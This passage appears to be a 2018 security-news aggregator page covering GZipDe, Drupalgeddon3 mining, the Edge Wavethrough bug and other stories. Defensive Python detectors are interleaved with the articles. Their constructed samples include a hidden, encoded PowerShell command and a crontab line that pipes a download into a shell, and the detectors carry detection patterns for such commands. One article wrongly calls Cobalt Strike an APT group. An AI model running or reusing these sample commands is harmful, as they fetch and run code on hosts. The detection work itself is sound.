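SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# -w hidden / -WindowStyle Hidden, or -e/-enc/-EncodedCommand <base64 blob>.
HIDDEN_PS = re.compile(
    r"(?i)(?:-|/)w(?:indowstyle)?\s+hidden"
    r"|(?:-|/)e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
)


def image_name(path):
    """Lower-case executable name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def lineage(events, pid):
    """Follow ParentProcessId links; returns image names root-first.
    Stops at unknown parents and guards against pid reuse loops."""
    by_pid = {e["ProcessId"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ParentProcessId"]
    return list(reversed(chain))


def find_suspicious(events):
    """Return one finding per suspicious process: pid, lineage, reasons."""
    findings = []
    for e in events:
        img = image_name(e["Image"])
        chain = lineage(events, e["ProcessId"])
        parent = chain[-2] if len(chain) >= 2 else None
        reasons = set()
        if parent in OFFICE and img in SCRIPT_HOSTS | SHELLS:
            reasons.add("office-spawns-script")
        if img in SHELLS and any(a in OFFICE for a in chain[:-1]):
            reasons.add("shell-under-office")       # catches the wscript hop
        if img in POWERSHELL and HIDDEN_PS.search(e.get("CommandLine", "")):
            reasons.add("hidden-or-encoded-powershell")
        if reasons:
            findings.append({"pid": e["ProcessId"], "chain": chain,
                             "reasons": sorted(reasons)})
    return findings


# Constructed sample: one malicious chain and one benign admin script.
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1,
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": '"WINWORD.EXE" /n "C:\\Users\\u\\Downloads\\summit.doc"'},
    {"ProcessId": 300, "ParentProcessId": 200,
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "wscript.exe //B C:\\Users\\u\\AppData\\Local\\Temp\\a.vbs"},
    {"ProcessId": 400, "ParentProcessId": 300,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Exec Bypass "
                    "-EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ProcessId": 500, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f["pid"], " -> ".join(f["chain"]), f["reasons"])
```

The benign `backup.ps1` launch under explorer.exe produces no finding, which is the property to keep when tuning: the signal is the Office ancestry plus the hidden/encoded flags, not PowerShell itself.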

Shellcode in the downloader connects to a server at 175.194.42[.]8 to deliver the final payload. The server wasn’t up during analysis, but it was previously recorded serving a Metasploit payload, the security researchers note.

Metasploit has become a popular choice among threat actors, and was previously seen being used in targeted attacks associated with the Turla hackers.

The Metasploit payload delivered from 175.194.42[.]8, AlienVault says, contains a shellcode to bypass system detection, as well as a Meterpreter payload. This malicious program is a powerful backdoor capable of gathering information from the system. The malware also stays in contact with the command and control server to receive further commands.

The shellcode, the researchers explain, loads the entire DLL into memory, meaning that it works without writing information to the disk.

Called reflective DLL injection, this technique allows the attacker to “transmit any other payload in order to acquire elevated privileges and move within the local network,” AlienVault concludes.


"Wavethrough" Bug in Microsoft Edge Leaks Sensitive Information
23.6.2018 securityweek Vulnerability

A security vulnerability patched by Microsoft earlier this month in its Edge browser could be exploited via malicious or compromised websites to read restricted data.

Tracked as CVE-2018-8235, the flaw occurs in how “Microsoft Edge improperly handles requests of different origins,” Microsoft explains in an advisory. The issue results in Edge bypassing Same-Origin Policy (SOP) restrictions and allows for requests that should otherwise be ignored.

As a result, an attacker could exploit the vulnerability to force the user’s browser to send data otherwise restricted. Attacks could be performed via maliciously crafted websites, compromised domains, or through websites that accept or host user-provided content or advertisements.

The vulnerability was discovered by Google developer Jake Archibald, who named it Wavethrough, because the bug occurs when a site uses service workers for the loading of multimedia content and the <audio> web API, which makes use of “range” requests.

The Range headers can be used by “media elements if the user seeks the media, so it can go straight to that point without downloading everything before it,” Archibald explains.

What the security researcher discovered was that, via a service worker, the Range header was missing, because media elements make “no-cors” requests.

“If you fetch() something from another origin, that origin has to give you permission to view the response. By default the request is made without cookies, and if you want cookies to be involved, the origin has to give extra permission for that,” he notes.

When special headers are used, the browser might also check with the origin before making the request, but some APIs ignore the checks, which could result in sensitive data being leaked. No-cors requests are sent with cookies and receive opaque responses, and some APIs may access the data in these responses.

Thus, when a media element makes a no-cors request with a Range header, fetch() removes the header, because it isn’t allowed in no-cors requests. However, because Range requests were never standardized in HTML, and because service workers are involved, a website could respond to them arbitrarily.

“You can respond to a request however you want, even if it's a no-cors request to another origin. For example, you can have an <img> on your page that points to facebook.com, but your service worker could return data from twitter.com,” the researcher explains.

After setting up a website that would do just that, Archibald discovered that the beta and nightly versions of Firefox allowed the redirect and eventually exposed the duration of the requested audio. The bug was patched before it made it to the stable Firefox release.

Edge too was found vulnerable, but it also allowed the resulting audio to pass through the web audio API, thus allowing for the monitoring of the samples being played. Because the request is made with cookies, the attack revealed content otherwise accessible only if the user is logged in.

“It means you could visit my site in Edge, and I could read your emails, I could read your Facebook feed, all without you knowing,” the researcher points out.

In addition to getting the bug addressed in Firefox and Edge, Archibald has been working on changing the standards regarding Range requests, so as to eliminate similar security issues. Furthermore, his discovery resulted in CORB being added to fetch().


Crooks exploit CVE-2018-7602 Drupal flaw, aka Drupalgeddon3 to deliver Monero miner
23.6.2018 securityaffairs Vulnerability

Crooks are attempting to exploit a recently patched Drupal vulnerability, tracked as CVE-2018-7602, to drop Monero mining malware onto vulnerable systems.
The CVE-2018-7602 flaw is a highly critical remote code execution issue, also known as Drupalgeddon3, that was addressed by the Drupal team in April with the release of versions 7.59, 8.4.8 and 8.5.3.

The security patch for the flaw only works if the fix for the original Drupalgeddon2 vulnerability (CVE-2018-7600) has already been applied to the installation.

In May, security experts at Malwarebytes reported that crooks were exploiting both Drupalgeddon2 and Drupalgeddon3 to deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

Now experts from Trend Micro have reported network attacks exploiting the CVE-2018-7602 flaw for Monero mining. The crooks use an exploit to fetch a shell script that retrieves an Executable and Linkable Format (ELF) downloader.

The malicious code adds a crontab entry to automatically update itself and to download and execute a modified variant of the open-source XMRig (version 2.6.3) Monero miner.

“We were able to observe a series of network attacks exploiting CVE-2018-7602, a security flaw in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots.” reads the analysis published by TrendMicro.

“While these attacks currently deliver resource-stealing and system performance-slowing malware, the vulnerability can be used as a doorway to other threats.”

The attackers hid their activity behind the Tor network, but experts tracked it to 197[.]231[.]221[.]211, an address that belongs to a range of IPs associated with a virtual private network (VPN) provider.

The downloader checks the target machine to determine if it could be compromised using the Drupal exploits.

Once executed, the miner will change its process name to [^$I$^] and access the file /tmp/dvir.pid.

“This is a red flag that administrators or information security professionals can take into account to discern malicious activities, such as when deploying host-based intrusion detection and prevention systems or performing forensics,” continues the report.


The actors behind this attack hide behind the Tor network, but Trend Micro says they were able to trace the activity to 197[.]231[.]221[.]211, an IP belonging to a virtual private network (VPN) provider.

Trend Micro confirmed that it has blocked 810 attacks coming from this IP address, but at the time there was no evidence that all of the attacks were related to the Monero-mining payload.

“The bulk of attacks from this IP address exploit Heartbleed (CVE-2014-0160). The other attacks we observed exploited ShellShock (CVE-2014-6271), an information disclosure vulnerability in WEB GoAhead (CVE-2017-5674), and a memory leak flaw in Apache (CVE-2004-0113).” states Trend Micro.

“Trend Micro also blocked File Transfer Protocol (FTP) and Secure Shell (SSH) brute-force logins from this IP address.”

Drupal admins are urged to install the available patches as soon as possible to avoid being hacked.


Hidden Tunnels: A Favored Tactic to Evade Strong Access Controls
22.6.2018 securityweek  Security

Use of Hidden Tunnels to Exfiltrate Data Far More Widespread in Financial Services Than Any Other Industry Sector

Financial services firms have perhaps the largest cyber security budgets and are the best protected companies in the private sector. Since cyber criminals generally have little difficulty obtaining a quick return on their effort, it would be unsurprising to find that financial services are less overtly targeted by average hackers than other, easier targets. At the same time, the data held by finserv is attractive enough that it remains a target for more sophisticated hackers.

Both premises are confirmed in a report (PDF) published this week by Vectra. From August 2017 through January 2018, Vectra's AI-based Cognito cyberattack-detection and threat-hunting platform monitored network traffic and collected metadata from more than 4.5 million devices and workloads from customer cloud, data center and enterprise environments.

An analysis of this data showed that financial services displayed fewer criminal C&C communication behaviors than the overall industry average. This could be caused by the efficiency of large finserv budgets (Bank of America spends $600 million annually, with no upper limit, while JPMorgan Chase spends $500 million annually) warding off basic criminal activity.

Even the much smaller Equifax has a budget of $85 million. But Equifax, with its massive 2017 loss of 145.5 million social security numbers, around 17.6 million drivers' license numbers, 20.3 million phone numbers, and 1.8 million email addresses, demonstrates that finserv is a target for, and can be successfully breached by, the more advanced hackers.

Vectra analyzed the Equifax breach and then compared the attack methodology to what its Cognito platform was finding in other financial services companies -- and it discovered the same breach methodology in other financial services firms. This is the use of hidden tunnels to hide the C&C servers and disguise the exfiltration of data.

Vectra's new analysis shows that the criminal use of hidden tunnels is far more widespread in financial services than in any other industry sector. Across all industries Vectra found 11 hidden exfiltration tunnels disguised as encrypted web traffic (HTTPS) for every 10,000 devices. In finserv, this number jumped to 23. Hidden HTTP tunnels jumped from seven per 10,000 devices to 16 in financial services.

Chris Morales, head of security analytics at Vectra, commented, "What stands out the most is the presence of hidden tunnels, which attackers use to evade strong access controls, firewalls and intrusion detection systems. The same hidden tunnels enable attackers to sneak out of networks, undetected, with stolen data."

"Hidden tunnels are difficult to detect," explains the report, "because communications are concealed within multiple connections that use normal, commonly-allowed protocols. For example, communications can be embedded as text in HTTP-GET requests, as well as in headers, cookies and other fields. The requests and responses are hidden among messages within the allowed protocol."

These hidden tunnels need to be protected at all times, says Will LaSala, director of security solutions and security evangelist at OneSpan. "Many app developers put holes through firewalls to make services easier to access from their apps, but these same holes can be exploited by hackers. Using the proper development tools, app developers can properly encrypt and shape the data being passed through these holes."

One of the problems is that developers are rushed to implement a new feature to maintain or gain customers, "and this," he adds, "often leads to situations where a hidden tunnel is created and not secured."

Once a hidden tunnel is established by an attacker, it is almost impossible to detect with traditional security. There is no signature to detect, while specially created C&C servers are unlikely to show up on reputation lists. Furthermore, because the traffic using a hidden tunnel is ostensibly legitimate traffic, there is no clear anomaly for anomaly detection systems to detect.
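One heuristic a defender can still apply to the cookie-smuggling case in the report's description: a session cookie is normally stable across a client's requests to a host, while a tunnel that carries data in the Cookie header changes the value, and keeps it high-entropy, on nearly every request. The Python below is an added example over constructed proxy log lines, not Vectra's Cognito logic; the log format, hostnames and cookie values are all made up.

```python
"""Flag (client, host) pairs whose Cookie values look like smuggled data.

Added example, not Vectra's detection logic. Log format, hostnames and
cookie values are constructed for illustration.
"""
from __future__ import annotations

import math
from collections import defaultdict

# Constructed proxy log, tab-separated: client, host, path, Cookie header.
# 10.0.0.5 reuses one session cookie; 10.0.0.7 sends a fresh, random-looking
# value on every request to the same host.
SAMPLE_LOG = """\
10.0.0.5\tintranet.example\t/home\tsession=abc123
10.0.0.5\tintranet.example\t/mail\tsession=abc123
10.0.0.5\tintranet.example\t/calendar\tsession=abc123
10.0.0.5\tintranet.example\t/files\tsession=abc123
10.0.0.7\tcdn.placeholder.invalid\t/img/1.png\tid=Zk9qM3RxVnB4dUxhN2VzT1kw
10.0.0.7\tcdn.placeholder.invalid\t/img/2.png\tid=R3hMdjJwWjlrQmJhVG5lMFN5
10.0.0.7\tcdn.placeholder.invalid\t/img/3.png\tid=N2NmSzRkWHRxUjhtTzZ2QWEx
10.0.0.7\tcdn.placeholder.invalid\t/img/4.png\tid=UHlxYzV3STJkTnFhSlZiMHRM
"""


def shannon_entropy(value: str) -> float:
    """Bits of entropy per character of `value` (0.0 for an empty string)."""
    if not value:
        return 0.0
    counts: dict[str, int] = defaultdict(int)
    for ch in value:
        counts[ch] += 1
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def cookie_values(cookie_header: str) -> list[str]:
    """Values of every name=value pair in a Cookie header."""
    values = []
    for pair in cookie_header.split(";"):
        _name, sep, value = pair.strip().partition("=")
        if sep:
            values.append(value)
    return values


def parse_log(text: str) -> list[dict]:
    """Split the constructed tab-separated log into rows."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        client, host, path, cookie = line.split("\t")
        rows.append({"client": client, "host": host, "path": path, "cookie": cookie})
    return rows


def flag_cookie_tunnels(text: str, min_requests: int = 4,
                        min_distinct_ratio: float = 0.8,
                        min_entropy: float = 3.5) -> list[dict]:
    """Score each (client, host) pair by how often its cookie changes and how
    random the values look. Sites that rotate a CSRF token per request will
    score high too, so treat hits as leads to triage, not as verdicts."""
    by_pair: dict[tuple[str, str], list[str]] = defaultdict(list)
    for row in parse_log(text):
        by_pair[(row["client"], row["host"])].append(row["cookie"])
    hits = []
    for (client, host), cookies in by_pair.items():
        if len(cookies) < min_requests:
            continue
        distinct_ratio = len(set(cookies)) / len(cookies)
        values = [v for c in cookies for v in cookie_values(c)]
        mean_entropy = sum(map(shannon_entropy, values)) / max(len(values), 1)
        if distinct_ratio >= min_distinct_ratio and mean_entropy >= min_entropy:
            hits.append({"client": client, "host": host, "requests": len(cookies),
                         "distinct_ratio": distinct_ratio,
                         "mean_entropy": round(mean_entropy, 2)})
    return hits
```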

What Vectra's analysis shows is that while there may be fewer overt attacks against financial services, the industry is a prime target for advanced hackers willing and able to invest in more covert attacks.

San Francisco, Calif-based Vectra Networks closed a $36 million Series D funding round in February 2018, bringing the total amount raised to date by the company to $123 million.


Red Alert Android Trojan for Rent at $500 Per Month
22.6.2018 securityweek  Android

The Red Alert 2.0 Android Trojan first detailed in September last year is currently available for rent on underground forums at $500 per month, Trustwave reports.

It is also capable of stealing information from the infected devices, including SMS messages and contact details, can block calls from banks, and can also keep in touch with bots via Twitter in the event its command and control (C&C) server is taken offline.

When they detailed the threat in September last year, SfyLabs’ researchers said the malware included around 60 HTML overlays used to steal login credentials, but also revealed that the Trojan’s actor was constantly releasing updates for their malicious program.

A Trustwave report published this week reveals that the malware author is currently advertising the Trojan as targeting nearly 120 banks in Australia, Austria, Canada, Czech Republic, Poland, Denmark, Germany, France, Lithuania, India, Italy, Ireland, Japan, New Zealand, Romania, Spain, Sweden, Turkey, United Kingdom, and the United States.

Additionally, the malware developer claims the Trojan is targeting payment systems (PayPal, Airbnb, Coinbase, Poker Stars, Neteller, Skrill, and Unocoin Bitcoin Wallet India) and CC+VBV Grabbers (Amazon, eBay, LINE, GetTaxi, Snapchat, Viber, Instagram, Facebook, Skype, UBER, WeChat, and WhatsApp) too.

Red Alert 2.0 is also advertised as able to intercept and send SMS messages and launch APKs. The author also claims new functionality is being developed, that injects can be built per customer request, and that updates are being released every two weeks. Miscreants can rent the Trojan starting at $200 for 7 days, $500 for a month, or $999 for 2 months.

As part of the analyzed Red Alert 2.0 attack, the malware was being distributed attached to spam messages. Although the threat is currently detected by nearly half of the VirusTotal anti-virus companies, the distribution method is still interesting for an Android malware family.

While analyzing the threat, the researchers discovered that it requests permissions to write, read, and receive SMS messages, make calls, and change network state, consistent with the advertised functionality.

The Trojan also includes services such as a watchdog that ensures it is running, services that register the device bot and wait for commands from the command and control (C&C) server, one that ensures the device is connected to the C&C, one that ensures the malware runs at reboot, and an SMS interceptor.

Another component is in charge of requesting permissions from the user and overlaying templates received from the C&C on top of legitimate apps. The malware also sets itself as the default telephony provider and requests device admin access (which allows it to completely wipe all data from the device).

C&C communication is performed using HTTP POST requests to a specific URL. If the website is not available, the malware attempts to connect with the operator through a Twitter message.

“At the time of our analysis, there were no longer any live C&C servers running and so we were unable to observe any traffic between the malware and the C&C server. We couldn't complete the reverse-engineering of some of the commands due to some issues, including no traffic observed, heavily obfuscated code, but also extremely buggy malware that crashed several times when we sent it a command,” the researchers note.


Hackers Exploit Drupal Flaw for Monero Mining
22.6.2018 securityweek Vulnerability

Network attacks exploiting a recently patched Drupal vulnerability are attempting to drop Monero mining malware onto vulnerable systems, Trend Micro reports.

Tracked as CVE-2018-7602 and considered a highly critical issue that could result in remote code execution, the vulnerability impacts Drupal’s versions 7 and 8 and was addressed in April this year.

The flaw is dubbed Drupalgeddon3 and the patch for it only works if the fix for the original Drupalgeddon2 vulnerability (CVE-2018-7600) has been applied.

Last month, hackers were observed targeting both security vulnerabilities to deliver a variety of threats, including cryptocurrency miners, remote administration tools (RATs) and tech support scams.

Trend Micro now says it has observed network attacks exploiting CVE-2018-7602 to turn affected systems into Monero-mining bots. In the observed incidents, the exploit fetches a shell script that retrieves an Executable and Linkable Format (ELF) downloader.

The malware adds a crontab entry to automatically update itself and also retrieves and installs a Monero-mining application, a modified variant of the open-source XMRig (version 2.6.3). The use of XMRig is a feature common to most attacks attempting to mine for Monero.

The downloader also checks the target machine to determine whether it is worth compromising.

When executed, the mining application changes its process name to [^$I$^] and accesses the file /tmp/dvir.pid, Trend Micro says.

“This is a red flag that administrators or information security professionals can take into account to discern malicious activities, such as when deploying host-based intrusion detection and prevention systems or performing forensics,” the security firm notes.

The actors behind this attack hide behind the Tor network, but Trend Micro says they were able to trace the activity to 197[.]231[.]221[.]211, an IP belonging to a virtual private network (VPN) provider. This IP address is a Tor exit node.

Over the past month, the security firm has blocked 810 attacks coming from this IP address, but cannot confirm that they were all related to the Monero-mining payload or performed by the same actor.

Most of the attacks attempt to exploit the Heartbleed vulnerability (CVE-2014-0160), while others target ShellShock (CVE-2014-6271), a flaw in WEB GoAhead (CVE-2017-5674), and an old memory leak in Apache (CVE-2004-0113).

“Trend Micro also blocked File Transfer Protocol (FTP) and Secure Shell (SSH) brute-force logins from this IP address. Note that these attacks exploit even old Linux or Unix-based vulnerabilities, underscoring the importance of defense in depth,” the security researchers warn.

Patched Drupal installations should be safe from the recent attacks and site admins are advised to apply the available patches as soon as possible, to ensure their systems remain secure.
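The process name, pid file and self-updating crontab entry described in this article and in the securityaffairs write-up above are host indicators a defender can check for. The following Python is an added example, not Trend Micro's tooling: it scans constructed `ps` and crontab samples for those indicators, generalizes the process-name check to any userland process masquerading as a bracketed kernel thread, and can be pointed at a live Linux host via main().

```python
"""Host checks for the Drupal Monero-miner indicators described above.

Added example (not Trend Micro's tooling). The `ps` and crontab samples
are constructed; the process name and pid file are the ones the report
names. Run stand-alone to check the local host instead of the samples.
"""
from __future__ import annotations

import re
import subprocess

MINER_PROCESS_NAME = "[^$I$^]"     # process name reported by Trend Micro
MINER_PID_FILE = "/tmp/dvir.pid"   # pid file reported by Trend Micro

# Constructed `ps -eo pid,comm,args` output: three benign processes and
# one miner that has renamed itself. The pool address is a placeholder.
SAMPLE_PS = """\
  PID COMMAND         COMMAND
    1 systemd         /sbin/init
  842 apache2         /usr/sbin/apache2 -k start
 1337 [^$I$^]         [^$I$^] -o pool.placeholder.invalid:3333
 2048 sshd            /usr/sbin/sshd -D
"""

# Constructed crontab: one normal backup job and one entry of the kind the
# downloader installs (periodically refetch a script from the web and run it).
SAMPLE_CRONTAB = """\
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://placeholder.invalid/dl.sh | sh
"""

PS_LINE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(.*)$")
DOWNLOAD_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")


def parse_ps(ps_output: str) -> list[dict]:
    """Parse `ps -eo pid,comm,args` text into dicts; the header is skipped."""
    rows = []
    for line in ps_output.splitlines():
        m = PS_LINE.match(line)
        if m:
            rows.append({"pid": int(m.group(1)), "comm": m.group(2),
                         "args": m.group(3).strip()})
    return rows


def suspicious_processes(ps_output: str) -> list[dict]:
    """Flag the known miner name and, more generally, any process whose comm
    field contains brackets. Real kernel threads show brackets only in the
    args column that ps adds, never in comm, so a bracketed comm is a
    userland process trying to look like a kernel thread."""
    hits = []
    for proc in parse_ps(ps_output):
        if proc["comm"] == MINER_PROCESS_NAME:
            reason = "known miner process name"
        elif "[" in proc["comm"] or "]" in proc["comm"]:
            reason = "bracketed comm (kernel-thread masquerade)"
        else:
            continue
        hits.append({**proc, "reason": reason})
    return hits


def suspicious_crontab_entries(crontab_text: str) -> list[str]:
    """Return crontab lines that pipe a downloaded script straight into a shell."""
    return [line for line in crontab_text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")
            and DOWNLOAD_AND_RUN.search(line)]


def read_pid_file(path: str = MINER_PID_FILE):
    """Return the PID recorded in the miner's pid file, or None if the file
    is absent or does not hold a number."""
    try:
        with open(path, encoding="ascii") as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return None


def main() -> None:
    """Check the live host (Linux) with the same functions."""
    ps_text = subprocess.run(["ps", "-eo", "pid,comm,args"], capture_output=True,
                             text=True, check=False).stdout
    cron_text = subprocess.run(["crontab", "-l"], capture_output=True,
                               text=True, check=False).stdout
    for hit in suspicious_processes(ps_text):
        print(f"process {hit['pid']} {hit['comm']!r}: {hit['reason']}")
    for entry in suspicious_crontab_entries(cron_text):
        print(f"crontab: {entry}")
    pid = read_pid_file()
    if pid is not None:
        print(f"{MINER_PID_FILE} present, records pid {pid}")


if __name__ == "__main__":
    main()
```

Run as root to see every user's processes; `crontab -l` only lists the invoking user's entries, so system-wide cron directories need a separate look.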


GZipDe Downloader spotted serving a Metasploit backdoor
22.6.2018 securityaffairs Virus

Security experts from AlienVault have spotted a new piece of malware named GZipDe that was used in a cyber-espionage campaign.
GZipDe is a downloader used by threat actors to fetch other payloads from an attacker-controlled server.

The malware was detected after a user from Afghanistan uploaded a weaponized Word document to the VirusTotal service; the document refers to the Shanghai Cooperation Organization Summit.

At the time it is not possible to attribute the malicious code to a specific actor: VirusTotal does not share information about the source of the upload, the target of the attack was not disclosed, and the researchers were only able to analyze the sample.

“It seems very targeted,” Chris Doman, a security researcher with AlienVault told Bleeping Computer. “Given the decoy document is in English and uploaded from Afghanistan, it may have been targeting someone in an embassy or similar there.”

The malicious code is multi-stage malware. The attack chain starts with a spear-phishing message spreading the weaponized Word document, and the final goal appears to be the delivery of a Metasploit backdoor.

“This is the first step of a multistage infection in which several servers and artifacts are involved. Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection.” reads the report published by Alien Vault.

The document was designed to trick victims into enabling macros, which then execute a Visual Basic script stored as a hexadecimal stream and launch a new task in a hidden PowerShell console that downloads a PE32 executable. The final step is the delivery of the GZipDe malware.


The GZipDe downloader was written in .NET, and implements a custom encryption method to obfuscate process memory and evade antivirus detection.

While investigating the GZipDe downloader the experts noticed that the server used to store the payloads that were fetched by the malware was down.

Further investigation allowed AlienVault to find information about the server on the Shodan search engine that had indexed it and recorded it serving a Metasploit backdoor.

“The payload contains shellcode that contacts the server at 175.194.42[.]8. Whilst the server isn’t up, Shodan recorded it serving a Metasploit payload:”

“The server, 175.194.42[.]8, delivers a Metasploit payload. It contains shellcode to bypass system detection (since it looks to have a valid DOS header) and a Meterpreter payload – a capable backdoor. For example, it can gather information from the system and contact the command and control server to receive further commands.”

The shellcode loads the entire DLL into memory, so the malware is fileless; it could allow attackers to transmit any other payload in order to acquire elevated privileges and move laterally within the local network.

The choice of Metasploit is not a novelty: APT groups like Cobalt Strike and CopyKittens have adopted it in their campaigns to make attribution of their attacks harder.

Technical details including IoCs are reported in the analysis published by AlienVault.


Cyber Intelligence Firm Intsights Raises $17 Million
22.6.2018 securityweek  IT

Israel-born startup Intsights Cyber Intelligence has raised $17 million in a Series C funding round led by Tola Capital. It brings the total capital raised by the firm to $41.3 million ($1.8 million seed funding in 2015; $7.5 million Series A in 2016; and $15 million Series B in 2017).

"This new round of funding," commented CEO Guy Nizan, "will fuel further investment in our cyber reconnaissance capability and global expansion, allowing us to bring the power of tailored intelligence to enterprises around the globe."

The firm was founded in Israel in 2015 by Alon Arvatz, Gal Ben David and Guy Nizan. All three are veterans of the elite cyber-warfare and intelligence services of the Israel Defense Forces (IDF). Intsights is now headquartered in New York, NY.

Intsights Cyber Intelligence is predicated on the idea that effective defense begins before an attack is launched. By definition, most traditional security controls are reactive. They attempt to recognize an attack at the perimeter and block it, or an existing incursion and mitigate it. But also by definition, reactive controls are after the event: the attack is in progress or has already succeeded.

Intsights seeks to be proactive -- to recognize and mitigate an attack before it occurs. It does this by crawling both the surface and dark web looking for indications that an attack is being planned by a hacker or criminal gang. Clues can include actions like scouting targets, using suspicious tools, and collaborating with other hackers on underground forums. The Intsights platform then goes further by integrating with many of the most popular security controls, automatically updating the security infrastructure to block or mitigate the budding attacks it discovers.

Intsights has 15 strategic partners, including firms like Splunk, Check Point, Palo Alto, Carbon Black, Fortinet, IBM, Microsoft, LogRhythm (now majority-owned by investment firm Thoma Bravo), and Symantec.

"Cyber-attacks are driven by humans who leave footprints and breadcrumbs as they plan their attack," explains Nizan. "Enterprises need tailored intelligence that looks beyond the firewall to see the indicators of attack their cyber adversaries leave and understand how, why and when they plan to attack."

Sheila Gulati, managing director of investment firm Tola Capital, expands: "Traditional threat intelligence solutions have failed to deliver the advantage promised to enterprise customers and their security teams. Today, CISOs want to understand what risks are coming and take a proactive stance, as well as determine what sensitive assets are already exposed. By leveraging a data and software enabled approach, security teams can prepare for upcoming attacks and prevent future attacks."

Of course, corporate risk isn't limited to the attack itself. Risk also comes from fake mobile applications, phishing sites, pastebin posts, social media pages, and malicious domains. These can be discovered by Intsights' web-crawling algorithms -- and the platform allows them to be remediated with a single click. "This is done," says Intsights, "via integration with social media platforms, app stores, and registrars by engaging with the IntSights External Remediation team."

The firm already has 20 of the Fortune Global 500 enterprises among its customers, from the financial services, automotive, telecom, apparel, and gaming industries. This customer base is growing at more than 200%. Intsights has offices in Amsterdam, Tokyo, Singapore, Dallas, and Boston and 40 reseller partners worldwide.


Microsoft Combats Bad Passwords With New Azure Tools
22.6.2018 securityweek Security 

Microsoft this week announced the public preview of new Azure tools designed to help its customers eliminate easily guessable passwords from their environments.

Following a flurry of data breaches in recent years, it has become clear that many users continue to protect their accounts with weak passwords that are easy to guess or brute force. Many people also tend to reuse the same password across multiple services.

Attackers continually use leaked passwords in live attacks, Verizon’s 2017 Data Breach Investigations Report (DBIR) revealed, and Microsoft banned commonly used passwords in Azure AD a couple of years ago.

Now, the company is taking the fight against bad passwords to a new level, with the help of Azure AD Password Protection and Smart Lockout, which were just released in public preview. These tools should significantly lower the risk of compromise through password spray attacks, Alex Simons, Director of Program Management, Microsoft Identity Division, says.

The new Azure AD Password Protection allows admins to prevent users from securing accounts in Azure AD and Windows Server Active Directory with weak passwords. For that, Microsoft uses a list of 500 most used passwords and over 1 million character substitution variations for them.

Management of Azure AD Password Protection is available in the Azure Active Directory portal for Azure AD and on-premises Windows Server Active Directory and admins will also be able to specify additional passwords to block.

To ensure users don’t use passwords that meet a complexity requirement but are easily guessable, or fall into predictable patterns if required to change their passwords frequently, organizations should apply a banned password system when passwords are changed, Microsoft says.

“Today’s public preview gives you both the ability to do this in the cloud and on-premises—wherever your users change their passwords—and unprecedented configurability. All this functionality is powered by Azure AD, which regularly updates the database of banned passwords by learning from billions of authentications and analysis of leaked credentials across the web,” Simons notes.

With Smart Lockout, Microsoft wants to lock out bad actors trying to guess users’ passwords. Leveraging cloud intelligence, it can recognize sign-ins from valid users and attempts from attackers and other unknown sources. Thus, users can remain productive while attackers are locked out.

Designed as an always-on feature, Smart Lockout is available for all Azure AD customers. While its default settings offer both security and usability, organizations can customize those settings with the right values for their environment.

By default, all Azure AD password set and reset operations for Azure AD Premium users are configured to use Azure AD password protection, Simons says. To configure their own settings, admins should access Authentication Methods under Azure AD Active Directory > Security.

Available options include setting a smart lockout threshold (number of failures until the first lockout) and duration (how long the lockout period lasts), choosing banned password strings, and extending the banned password protection to Windows Server Active Directory.

Organizations can also download and install the Azure AD password protection proxy and domain controller agents in their on-premises environment (both support silent installation), meaning that they can use Azure AD password protection across Azure AD and on-premises.


Google Marks APKs Distributed by Google Play
22.6.2018 securityweek Android

Google this week announced that it is adding a small amount of security metadata on top of APKs distributed by Google Play in order to verify their authenticity.

Initially announced in December 2017, the new change is designed to verify product authenticity from Google Play and is accompanied by an adjusted Google Play maximum APK size to take into account the small metadata addition.

The metadata is meant to work similarly to the official labels or badges that manufacturers place on physical products to mark their authenticity. The metadata will signify Play’s badge of authenticity for all Android apps distributed through the official marketplace.

“One of the reasons we're doing this is to help developers reach a wider audience, particularly in countries where peer-to-peer app sharing is common because of costly data plans and limited connectivity,” James Bender, Product Manager, Google Play, says.

According to Bender, the new “badge” will help determine the app authenticity for apps obtained through Play-approved distribution channels when the device is offline. These shared apps will be added to a Play Library and app updates management will be possible when the device has connectivity.

“This will give people more confidence when using Play-approved peer-to-peer sharing apps,” he notes.

Developers are also expected to benefit from this change, not only because a Play-authorized offline distribution channel will be available for them, but also because, once the peer-to-peer shared apps are added to the Play library, they become eligible for updates from Play.

Google says no action is required from the developers or from the users of their applications. The small metadata addition is inserted into the APK Signing Block and is expected to improve the integrity of Google Play's mobile app ecosystem.

Beginning in August 2018, developers will need to target API level 26 (Android 8.0) or higher with their new apps. Starting November this year, app updates will have to comply with this requirement as well. Existing applications that don’t receive updates won’t be affected by these changes.


Cisco Patches Critical Flaws in NX-OS Software
22.6.2018 securityweek Vulnerability

Cisco on Wednesday released patches for more than 30 security vulnerabilities in its products, including Critical flaws impacting NX-OS Software.

